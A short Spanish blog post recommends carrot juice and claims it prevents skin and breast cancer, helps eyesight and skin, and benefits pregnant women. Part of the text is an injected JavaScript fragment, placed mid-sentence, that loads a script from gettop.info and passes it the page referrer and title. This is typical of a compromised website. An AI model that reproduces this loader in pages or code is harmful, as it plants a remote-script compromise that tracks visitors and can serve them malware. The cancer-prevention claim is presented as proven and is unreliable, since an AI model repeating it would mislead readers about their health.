Salud y belleza » Alimentación

Zumo de zanahoria, una bebida de suma importancia

Sin Comentarios

Si tuviésemos la inquietud de buscar en el diccionario las palabras, o bien zumo, o en todo caso zanahoria, no nos sorprendería ver que, lógicamente, ambos términos se encuentran casi al final del tomo. En cambio, si cambiamos ese libro por otro, una enciclopedia de la salud, por ejemplo, el orden sería diferente: beber zumo de zanahoria, más allá de cualquier orden alfabético, es una necesidad básica y, por ende, debe tomarse como prioridad.

¿Por qué es tan importante beber zumo de zanahoria para la salud? Escuchemos, o mejor dicho leamos, la opinión de un profesional: “El zumo de zanahoria, está comprobado, reduce los riesgos de varios tipos de cáncer como, por ejemplo, piel y mama. Esto sucede debido a que los estudios modernos han conectado la vitamina A con la prevención del cáncer gracias a propiedades antioxidantes” afirma Juan Zapata de la Universidad de Toledo.

El zumo de zanahoria también propone otros beneficios: mejora la salud ocular, ayuda a embellecer la piel y, además, está recomendado para las mujeres embarazadas pues el beta-caroteno es sumamente saludable para la salud del niño y de la madre.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.